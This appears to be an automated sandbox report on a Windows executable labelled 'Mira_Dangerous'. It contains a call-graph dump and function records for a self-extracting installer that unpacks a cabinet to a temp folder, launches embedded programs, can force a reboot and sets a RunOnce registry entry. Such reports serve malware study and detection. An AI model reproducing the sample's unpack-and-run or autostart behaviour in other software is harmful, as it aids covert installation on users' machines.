2314->2316 2315 7ff7a8cc331f 2315->2299 2322 7ff7a8cc2318 18 API calls 2315->2322 2328 7ff7a8cc3347 2315->2328 2583 7ff7a8cc6ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2316->2583 2320 7ff7a8cc322b 2317->2320 2319->2315 2323 7ff7a8cc32fb 2319->2323 2326 7ff7a8cc32cb 2319->2326 2694 7ff7a8cc7700 GetLastError 2320->2694 2322->2328 2609 7ff7a8cc5d90 2323->2609 2325 7ff7a8cc3368 2325->2299 2329 7ff7a8cc3383 2325->2329 2330 7ff7a8cc7ac8 28 API calls 2326->2330 2328->2325 2629 7ff7a8cc40c4 2328->2629 2705 7ff7a8cc494c 2329->2705 2331 7ff7a8cc32f6 2330->2331 2331->2299 2695 7ff7a8cc772c 2331->2695 2336 7ff7a8cc6214 2335->2336 2337 7ff7a8cc624c LocalFree LocalFree 2336->2337 2339 7ff7a8cc6229 SetFileAttributesA DeleteFileA 2336->2339 2346 7ff7a8cc6273 2336->2346 2337->2336 2338 7ff7a8cc6311 2340 7ff7a8cc6387 2338->2340 2342 7ff7a8cc632d RegOpenKeyExA 2338->2342 2339->2337 2341 7ff7a8cc8470 7 API calls 2340->2341 2343 7ff7a8cc2ce8 2341->2343 2342->2340 2344 7ff7a8cc635e RegDeleteValueA RegCloseKey 2342->2344 2343->2231 2343->2238 2349 7ff7a8cc2318 2343->2349 2344->2340 2345 7ff7a8cc62f4 SetCurrentDirectoryA 2347 7ff7a8cc204c 16 API calls 2345->2347 2346->2338 2346->2345 2348 7ff7a8cc7c40 4 API calls 2346->2348 2347->2338 2348->2345 2350 7ff7a8cc2330 2349->2350 2351 7ff7a8cc2447 2349->2351 2352 7ff7a8cc23cb RegOpenKeyExA 2350->2352 2354 7ff7a8cc233a 2350->2354 2936 7ff7a8cc2244 GetWindowsDirectoryA 2351->2936 2355 7ff7a8cc23c3 2352->2355 2356 7ff7a8cc23fe RegQueryInfoKeyA 2352->2356 2354->2355 2357 7ff7a8cc234a RegOpenKeyExA 2354->2357 2355->2238 2358 7ff7a8cc23a8 RegCloseKey 2356->2358 2357->2355 2359 7ff7a8cc237d RegQueryValueExA 2357->2359 2358->2355 2359->2358 2361 7ff7a8cc1c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2360->2361 2362 7ff7a8cc1c4c 2360->2362 2361->2362 2363 7ff7a8cc1cec ExitWindowsEx 2361->2363 2364 7ff7a8cc4dcc 24 API calls 2362->2364 2363->2362 2365 7ff7a8cc1c68 2363->2365 2364->2365 2366 7ff7a8cc8470 7 API calls 2365->2366 2367 
7ff7a8cc1d1a 2366->2367 2367->2231 2369 7ff7a8cc2e43 2368->2369 2370 7ff7a8cc509b 2368->2370 2369->2250 2369->2251 2370->2369 2371 7ff7a8cc50a4 FindResourceA LoadResource LockResource 2370->2371 2371->2369 2372 7ff7a8cc50e3 memcpy_s FreeResource 2371->2372 2372->2369 2374 7ff7a8cc7566 2373->2374 2384 7ff7a8cc70f2 2373->2384 2375 7ff7a8cc8470 7 API calls 2374->2375 2377 7ff7a8cc2fb1 2375->2377 2376 7ff7a8cc71ca 2376->2374 2379 7ff7a8cc71e7 GetModuleFileNameA 2376->2379 2377->2250 2377->2266 2378 7ff7a8cc711d CharNextA 2378->2384 2380 7ff7a8cc720f 2379->2380 2381 7ff7a8cc721c 2379->2381 2449 7ff7a8cc7d68 2380->2449 2381->2374 2383 7ff7a8cc76f1 2458 7ff7a8cc8648 RtlCaptureContext RtlLookupFunctionEntry 2383->2458 2384->2374 2384->2376 2384->2378 2384->2383 2387 7ff7a8cc7238 CharUpperA 2384->2387 2393 7ff7a8cc739d CharUpperA 2384->2393 2394 7ff7a8cc7346 CompareStringA 2384->2394 2395 7ff7a8cc73fb CharUpperA 2384->2395 2396 7ff7a8cc7492 CharUpperA 2384->2396 2397 7ff7a8cc72d0 CharUpperA 2384->2397 2398 7ff7a8cc7ce8 IsDBCSLeadByte CharNextA 2384->2398 2454 7ff7a8cc7ba8 2384->2454 2387->2384 2388 7ff7a8cc766f 2387->2388 2389 7ff7a8cc4dcc 24 API calls 2388->2389 2390 7ff7a8cc7692 2389->2390 2391 7ff7a8cc76aa ExitProcess 2390->2391 2392 7ff7a8cc769e CloseHandle 2390->2392 2392->2391 2393->2384 2394->2384 2395->2384 2396->2384 2397->2384 2398->2384 2401 7ff7a8cc2213 2400->2401 2404 7ff7a8cc2086 2400->2404 2402 7ff7a8cc8470 7 API calls 2401->2402 2403 7ff7a8cc2222 2402->2403 2403->2260 2405 7ff7a8cc20dc FindFirstFileA 2404->2405 2405->2401 2406 7ff7a8cc20fe 2405->2406 2407 7ff7a8cc21a3 2406->2407 2408 7ff7a8cc2138 lstrcmpA 2406->2408 2409 7ff7a8cc21d9 FindNextFileA 2406->2409 2413 7ff7a8cc7ba8 CharPrevA 2406->2413 2414 7ff7a8cc204c 8 API calls 2406->2414 2411 7ff7a8cc21b4 SetFileAttributesA DeleteFileA 2407->2411 2408->2409 2410 7ff7a8cc2158 lstrcmpA 2408->2410 2409->2406 2412 7ff7a8cc21f5 FindClose RemoveDirectoryA 2409->2412 2410->2406 2410->2409 2411->2409 2412->2401 
2413->2406 2414->2406 2416 7ff7a8cc3c4f 2415->2416 2421 7ff7a8cc3c59 2415->2421 2417 7ff7a8cc4dcc 24 API calls 2416->2417 2418 7ff7a8cc3f05 2416->2418 2417->2418 2419 7ff7a8cc8470 7 API calls 2418->2419 2420 7ff7a8cc3042 2419->2420 2420->2260 2430 7ff7a8cc12ec 2420->2430 2421->2416 2421->2418 2423 7ff7a8cc3db1 2421->2423 2464 7ff7a8cc2834 2421->2464 2423->2416 2423->2418 2424 7ff7a8cc3eb7 MessageBeep 2423->2424 2425 7ff7a8cc7f04 13 API calls 2424->2425 2426 7ff7a8cc3eca 2425->2426 2427 7ff7a8cc3ed3 MessageBoxA 2426->2427 2428 7ff7a8cc7e34 2 API calls 2426->2428 2427->2418 2428->2427 2431 7ff7a8cc14b5 2430->2431 2432 7ff7a8cc133c 2430->2432 2434 7ff7a8cc8470 7 API calls 2431->2434 2496 7ff7a8cc11cc LoadLibraryA 2432->2496 2436 7ff7a8cc14da 2434->2436 2436->2260 2436->2288 2437 7ff7a8cc134d GetCurrentProcess OpenProcessToken 2437->2431 2438 7ff7a8cc1377 GetTokenInformation 2437->2438 2439 7ff7a8cc14a0 CloseHandle 2438->2439 2440 7ff7a8cc13a0 GetLastError 2438->2440 2439->2431 2440->2439 2441 7ff7a8cc13b5 LocalAlloc 2440->2441 2441->2439 2442 7ff7a8cc13d2 GetTokenInformation 2441->2442 2443 7ff7a8cc1491 LocalFree 2442->2443 2444 7ff7a8cc13fc AllocateAndInitializeSid 2442->2444 2443->2439 2444->2443 2447 7ff7a8cc1445 2444->2447 2445 7ff7a8cc1481 FreeSid 2445->2443 2446 7ff7a8cc1452 EqualSid 2446->2447 2448 7ff7a8cc1476 2446->2448 2447->2445 2447->2446 2447->2448 2448->2445 2450 7ff7a8cc7dd9 2449->2450 2451 7ff7a8cc7d88 2449->2451 2450->2381 2452 7ff7a8cc7d90 IsDBCSLeadByte 2451->2452 2453 7ff7a8cc7db6 CharNextA 2451->2453 2452->2451 2453->2450 2453->2451 2455 7ff7a8cc7bc8 2454->2455 2455->2455 2456 7ff7a8cc7bec CharPrevA 2455->2456 2457 7ff7a8cc7bda 2455->2457 2456->2457 2457->2384 2459 7ff7a8cc8685 RtlVirtualUnwind 2458->2459 2460 7ff7a8cc86c7 2458->2460 2459->2460 2463 7ff7a8cc8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2460->2463 2465 7ff7a8cc2a2f 2464->2465 2475 7ff7a8cc2872 2464->2475 2466 7ff7a8cc2a41 GlobalFree 
2465->2466 2467 7ff7a8cc2a50 2465->2467 2466->2467 2467->2423 2469 7ff7a8cc28a5 GetFileVersionInfoSizeA 2470 7ff7a8cc28c2 GlobalAlloc 2469->2470 2469->2475 2470->2465 2471 7ff7a8cc28e1 GlobalLock 2470->2471 2471->2465 2472 7ff7a8cc28fc GetFileVersionInfoA 2471->2472 2473 7ff7a8cc2920 VerQueryValueA 2472->2473 2472->2475 2474 7ff7a8cc29ed GlobalUnlock 2473->2474 2473->2475 2474->2475 2475->2465 2475->2469 2475->2474 2476 7ff7a8cc29d9 GlobalUnlock 2475->2476 2477 7ff7a8cc261c 2475->2477 2476->2465 2478 7ff7a8cc27e0 GetSystemDirectoryA 2477->2478 2479 7ff7a8cc265b CharUpperA CharNextA CharNextA 2477->2479 2480 7ff7a8cc27f1 2478->2480 2481 7ff7a8cc27dd 2479->2481 2482 7ff7a8cc269c 2479->2482 2483 7ff7a8cc2805 2480->2483 2486 7ff7a8cc7ba8 CharPrevA 2480->2486 2481->2478 2484 7ff7a8cc27c7 GetWindowsDirectoryA 2482->2484 2485 7ff7a8cc26a6 2482->2485 2487 7ff7a8cc8470 7 API calls 2483->2487 2484->2480 2489 7ff7a8cc7ba8 CharPrevA 2485->2489 2486->2483 2488 7ff7a8cc2814 2487->2488 2488->2475 2490 7ff7a8cc2705 RegOpenKeyExA 2489->2490 2490->2480 2491 7ff7a8cc2738 RegQueryValueExA 2490->2491 2492 7ff7a8cc27b4 RegCloseKey 2491->2492 2493 7ff7a8cc276b 2491->2493 2492->2480 2494 7ff7a8cc2774 ExpandEnvironmentStringsA 2493->2494 2495 7ff7a8cc2792 2493->2495 2494->2495 2495->2492 2497 7ff7a8cc1221 GetProcAddress 2496->2497 2498 7ff7a8cc12bb 2496->2498 2500 7ff7a8cc123f AllocateAndInitializeSid 2497->2500 2501 7ff7a8cc12ac FreeLibrary 2497->2501 2499 7ff7a8cc8470 7 API calls 2498->2499 2502 7ff7a8cc12ca 2499->2502 2500->2501 2503 7ff7a8cc1288 FreeSid 2500->2503 2501->2498 2502->2431 2502->2437 2503->2501 2506 7ff7a8cc5050 7 API calls 2505->2506 2507 7ff7a8cc60bf LocalAlloc 2506->2507 2508 7ff7a8cc60dd 2507->2508 2509 7ff7a8cc610b 2507->2509 2510 7ff7a8cc4dcc 24 API calls 2508->2510 2511 7ff7a8cc5050 7 API calls 2509->2511 2512 7ff7a8cc60fb 2510->2512 2513 7ff7a8cc611d 2511->2513 2718 7ff7a8cc7700 GetLastError 2512->2718 2514 7ff7a8cc6121 2513->2514 2515 7ff7a8cc615a lstrcmpA 
2513->2515 2517 7ff7a8cc4dcc 24 API calls 2514->2517 2518 7ff7a8cc6174 LocalFree 2515->2518 2519 7ff7a8cc618a 2515->2519 2520 7ff7a8cc613f LocalFree 2517->2520 2523 7ff7a8cc3123 2518->2523 2521 7ff7a8cc4dcc 24 API calls 2519->2521 2520->2523 2522 7ff7a8cc61ac LocalFree 2521->2522 2522->2523 2523->2291 2523->2293 2523->2299 2525 7ff7a8cc5050 7 API calls 2524->2525 2526 7ff7a8cc6001 2525->2526 2527 7ff7a8cc6006 2526->2527 2528 7ff7a8cc604a 2526->2528 2530 7ff7a8cc4dcc 24 API calls 2527->2530 2529 7ff7a8cc5050 7 API calls 2528->2529 2531 7ff7a8cc6063 2529->2531 2534 7ff7a8cc3146 2530->2534 2532 7ff7a8cc772c 13 API calls 2531->2532 2533 7ff7a8cc606f 2532->2533 2533->2534 2535 7ff7a8cc4dcc 24 API calls 2533->2535 2534->2299 2536 7ff7a8cc66c4 2534->2536 2535->2534 2537 7ff7a8cc5050 7 API calls 2536->2537 2538 7ff7a8cc6706 LocalAlloc 2537->2538 2539 7ff7a8cc6756 2538->2539 2540 7ff7a8cc6726 2538->2540 2542 7ff7a8cc5050 7 API calls 2539->2542 2541 7ff7a8cc4dcc 24 API calls 2540->2541 2544 7ff7a8cc6744 2541->2544 2543 7ff7a8cc6768 2542->2543 2545 7ff7a8cc67a5 lstrcmpA LocalFree 2543->2545 2546 7ff7a8cc676c 2543->2546 2743 7ff7a8cc7700 GetLastError 2544->2743 2551 7ff7a8cc6837 2545->2551 2553 7ff7a8cc67ec 2545->2553 2548 7ff7a8cc4dcc 24 API calls 2546->2548 2549 7ff7a8cc678a LocalFree 2548->2549 2554 7ff7a8cc6749 2549->2554 2550 7ff7a8cc6b14 2555 7ff7a8cc7ac8 28 API calls 2550->2555 2551->2550 2552 7ff7a8cc684f GetTempPathA 2551->2552 2556 7ff7a8cc6872 2552->2556 2564 7ff7a8cc68a5 2552->2564 2558 7ff7a8cc64e4 53 API calls 2553->2558 2557 7ff7a8cc8470 7 API calls 2554->2557 2555->2554 2719 7ff7a8cc64e4 2556->2719 2560 7ff7a8cc3153 2557->2560 2561 7ff7a8cc680c 2558->2561 2560->2299 2560->2304 2561->2554 2563 7ff7a8cc4dcc 24 API calls 2561->2563 2563->2554 2564->2554 2565 7ff7a8cc68f9 GetDriveTypeA 2564->2565 2566 7ff7a8cc6adb GetWindowsDirectoryA 2564->2566 2568 7ff7a8cc6916 GetFileAttributesA 2565->2568 2581 7ff7a8cc6911 2565->2581 2570 7ff7a8cc6ca4 38 API calls 2566->2570 
2568->2581 2570->2564 2571 7ff7a8cc64e4 53 API calls 2571->2564 2572 7ff7a8cc6ca4 38 API calls 2572->2581 2573 7ff7a8cc6955 GetDiskFreeSpaceA 2575 7ff7a8cc6983 MulDiv 2573->2575 2573->2581 2574 7ff7a8cc2468 25 API calls 2574->2581 2575->2581 2576 7ff7a8cc6a02 GetWindowsDirectoryA 2576->2581 2577 7ff7a8cc7ba8 CharPrevA 2578 7ff7a8cc6a2a GetFileAttributesA 2577->2578 2579 7ff7a8cc6a40 CreateDirectoryA 2578->2579 2578->2581 2579->2581 2580 7ff7a8cc6a6d SetFileAttributesA 2580->2581 2581->2554 2581->2565 2581->2566 2581->2568 2581->2572 2581->2573 2581->2574 2581->2576 2581->2577 2581->2580 2582 7ff7a8cc64e4 53 API calls 2581->2582 2582->2581 2584 7ff7a8cc6d12 2583->2584 2585 7ff7a8cc6d3f GetDiskFreeSpaceA 2583->2585 2586 7ff7a8cc4dcc 24 API calls 2584->2586 2587 7ff7a8cc6d80 MulDiv 2585->2587 2588 7ff7a8cc6f63 memset 2585->2588 2589 7ff7a8cc6d2f 2586->2589 2587->2588 2591 7ff7a8cc6dae GetVolumeInformationA 2587->2591 2794 7ff7a8cc7700 GetLastError 2588->2794 2775 7ff7a8cc7700 GetLastError 2589->2775 2594 7ff7a8cc6de6 memset 2591->2594 2595 7ff7a8cc6e45 SetCurrentDirectoryA 2591->2595 2593 7ff7a8cc6f7b GetLastError FormatMessageA 2597 7ff7a8cc6fbd 2593->2597 2776 7ff7a8cc7700 GetLastError 2594->2776 2599 7ff7a8cc6e6c 2595->2599 2600 7ff7a8cc4dcc 24 API calls 2597->2600 2598 7ff7a8cc6dfe GetLastError FormatMessageA 2598->2597 2604 7ff7a8cc6eb4 2599->2604 2607 7ff7a8cc6ed8 2599->2607 2601 7ff7a8cc6fd8 SetCurrentDirectoryA 2600->2601 2606 7ff7a8cc6d34 2601->2606 2602 7ff7a8cc8470 7 API calls 2603 7ff7a8cc326f 2602->2603 2603->2299 2603->2311 2605 7ff7a8cc4dcc 24 API calls 2604->2605 2605->2606 2606->2602 2607->2606 2777 7ff7a8cc24f8 2607->2777 2610 7ff7a8cc5050 7 API calls 2609->2610 2611 7ff7a8cc5dab FindResourceA LoadResource LockResource 2610->2611 2612 7ff7a8cc5dfc 2611->2612 2626 7ff7a8cc5fcf 2611->2626 2613 7ff7a8cc5e56 2612->2613 2614 7ff7a8cc5e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2612->2614 2795 7ff7a8cc5c60 #20 2613->2795 2614->2613 2617 7ff7a8cc5e5f 
2620 7ff7a8cc4dcc 24 API calls 2617->2620 2618 7ff7a8cc5e69 #20 2618->2617 2619 7ff7a8cc5ed1 #22 2618->2619 2621 7ff7a8cc5f15 #23 2619->2621 2622 7ff7a8cc5f53 2619->2622 2620->2622 2621->2617 2621->2622 2623 7ff7a8cc5f61 FreeResource 2622->2623 2624 7ff7a8cc5f75 2622->2624 2623->2624 2625 7ff7a8cc5f9f 2624->2625 2627 7ff7a8cc4dcc 24 API calls 2624->2627 2625->2626 2628 7ff7a8cc5fb1 SendMessageA 2625->2628 2626->2331 2627->2625 2628->2626 2630 7ff7a8cc4118 2629->2630 2642 7ff7a8cc412f 2629->2642 2631 7ff7a8cc5050 7 API calls 2630->2631 2631->2642 2632 7ff7a8cc4145 memset 2632->2642 2633 7ff7a8cc4254 2634 7ff7a8cc4dcc 24 API calls 2633->2634 2640 7ff7a8cc4273 2634->2640 2636 7ff7a8cc8470 7 API calls 2637 7ff7a8cc44ff 2636->2637 2637->2325 2638 7ff7a8cc42f5 CompareStringA 2639 7ff7a8cc45d8 2638->2639 2638->2642 2639->2640 2644 7ff7a8cc45f2 RegOpenKeyExA 2639->2644 2640->2636 2641 7ff7a8cc44df LocalFree 2641->2640 2642->2632 2642->2633 2642->2638 2642->2639 2642->2640 2642->2641 2643 7ff7a8cc5050 7 API calls 2642->2643 2645 7ff7a8cc4599 2642->2645 2653 7ff7a8cc44ad LocalFree 2642->2653 2656 7ff7a8cc41fd CompareStringA 2642->2656 2672 7ff7a8cc4394 2642->2672 2807 7ff7a8cc1684 2642->2807 2846 7ff7a8cc1d28 memset memset RegCreateKeyExA 2642->2846 2873 7ff7a8cc473c CreateProcessA 2642->2873 2643->2642 2644->2640 2648 7ff7a8cc4627 RegQueryValueExA 2644->2648 2647 7ff7a8cc4dcc 24 API calls 2645->2647 2649 7ff7a8cc45b8 LocalFree 2647->2649 2651 7ff7a8cc471c RegCloseKey 2648->2651 2652 7ff7a8cc466c memset GetSystemDirectoryA 2648->2652 2649->2640 2651->2640 2654 7ff7a8cc46b3 2652->2654 2655 7ff7a8cc469d 2652->2655 2653->2639 2653->2642 2659 7ff7a8cc114c _vsnprintf 2654->2659 2658 7ff7a8cc7ba8 CharPrevA 2655->2658 2656->2642 2658->2654 2660 7ff7a8cc46dc RegSetValueExA 2659->2660 2660->2651 2661 7ff7a8cc43a5 GetProcAddress 2663 7ff7a8cc4521 2661->2663 2661->2672 2662 7ff7a8cc4574 2664 7ff7a8cc4dcc 24 API calls 2662->2664 2667 7ff7a8cc4dcc 24 API calls 2663->2667 2666 

Callgraph


Executed Functions

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
  • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$Mira$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
  • API String ID: 2679723528-2018640329
  • Opcode ID: 8509239b70171e5e8f30f25a201f846f3f354706cd48434738ed3a295e3e973f
  • Instruction ID: 7ebe1029317d2bf56a6ce9fe6e5f409da95dc0eec2ffacdead92587e05b09bee
  • Opcode Fuzzy Hash: 8509239b70171e5e8f30f25a201f846f3f354706cd48434738ed3a295e3e973f
  • Instruction Fuzzy Hash: 460293F1A0A64286E720AF10E8406B9FBA0FB84744FD661B5DA4D436B4DF3CD549CF28

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
  • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
  • API String ID: 178549006-3765599613
  • Opcode ID: b299ff31df0d2b05a6531c91114b9e5cd943ed9aaaacf04066293d09cb26884f
  • Instruction ID: 397c2550042197c3ed55f229b7a899685b17b9451ead3de382eb000f81054a2d
  • Opcode Fuzzy Hash: b299ff31df0d2b05a6531c91114b9e5cd943ed9aaaacf04066293d09cb26884f
  • Instruction Fuzzy Hash: FC8194B2A09B4186E710AF11E8542B9F7A0FB89B54FC661B2D94E43764DF3CD509CB18

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
  • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
  • API String ID: 3973824516-3855382519
  • Opcode ID: d6c8b5fd4d55c6658b4f1a5334f7fcaaca393b8f8d38eb7b9bd80be6ad316fe1
  • Instruction ID: 6658dcddf36018200883cd2f6c4dea38dbb651c7598e70d1f445f31af8c034bc
  • Opcode Fuzzy Hash: d6c8b5fd4d55c6658b4f1a5334f7fcaaca393b8f8d38eb7b9bd80be6ad316fe1
  • Instruction Fuzzy Hash: 8BD1D8B2A1A64286EB50AF20D51067AF7A0FF85740FD260B9DA4D436B5DF3DD405CF24

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
  • String ID: $EXTRACTOPT$INSTANCECHECK$Mira$TITLE$VERCHECK
  • API String ID: 3100096412-1777076177
  • Opcode ID: 1e1f08e9617b55e2358bcf68bebb50a442f06fc450e3a76ad8f9db5257c5e185
  • Instruction ID: d34cc9abadb038e5d5eac065ab806bb3f53cb6aad58231b1ca5695357389e7ba
  • Opcode Fuzzy Hash: 1e1f08e9617b55e2358bcf68bebb50a442f06fc450e3a76ad8f9db5257c5e185
  • Instruction Fuzzy Hash: FD819CF1A0A64286F760BB25B8003BAEA90FF84745FC260B5D94D426B4DF7CE445CF28

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
  • API String ID: 4237285672-2312194364
  • Opcode ID: 6e762584361d752baa37747b7a7dbfb637054f2efd45ef9d1ea5ad97e5778722
  • Instruction ID: 9484d76a55dfd7f00ec2027dbaa58a9074d233afc16a8fce40354a341699e11a
  • Opcode Fuzzy Hash: 6e762584361d752baa37747b7a7dbfb637054f2efd45ef9d1ea5ad97e5778722
  • Instruction Fuzzy Hash: 6FA1B7B6A1A74187E720AF24E5406BAFBA0FB89744F856179EA4D03B64CF3CD409CF14

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
  • String ID: *MEMCAB$CABINET
  • API String ID: 1305606123-2642027498
  • Opcode ID: 33af6c9407e7061855ebb592c3b8b842de52abeaee4983045e05688ac2eae533
  • Instruction ID: e58877a55ee4e30d79ef3474b1777db79248c36c7010dc93a10364c25904191e
  • Opcode Fuzzy Hash: 33af6c9407e7061855ebb592c3b8b842de52abeaee4983045e05688ac2eae533
  • Instruction Fuzzy Hash: B951EBB1A0AB4286EB10AB11E854375FBA0FB89746FC661B5D94D42774DF3CE049CF28

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
  (The same source dump and associated dumps apply to every function record in this section.)
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
  • API String ID: 3010855178-58291647
  • Opcode ID: 318615db84064735d313a4df34e1aaf9c06dfad497c9bce78216585d7a81758b
  • Instruction ID: aee02915fc60b529dd649c25b051698cabca31caf9a46eb436d08c3e5df8bd1c
  • Opcode Fuzzy Hash: 318615db84064735d313a4df34e1aaf9c06dfad497c9bce78216585d7a81758b
  • Instruction Fuzzy Hash: 4C7141E0E0F64385FB60BB21B940376E694EF84750FC760B9D94D825B2DF2CE4458E28

Control-flow Graph

Control-flow graph (text dump) of the function at 00007FF7A8CC64E4, basic blocks 517-562; the original rendering marks each block as executed or not executed. Win32 calls reached from its blocks: GetSystemInfo, CreateDirectoryA, RemoveDirectoryA; the remaining call targets (00007FF7A8CC63B8, 00007FF7A8CC6B70, 00007FF7A8CC7BA8, 00007FF7A8CC7700, 00007FF7A8CC6CA4, 00007FF7A8CC8470) are internal subroutines of the sample.
APIs
  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7A8CC2CE1), ref: 00007FF7A8CC657C
  • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7A8CC2CE1), ref: 00007FF7A8CC662F
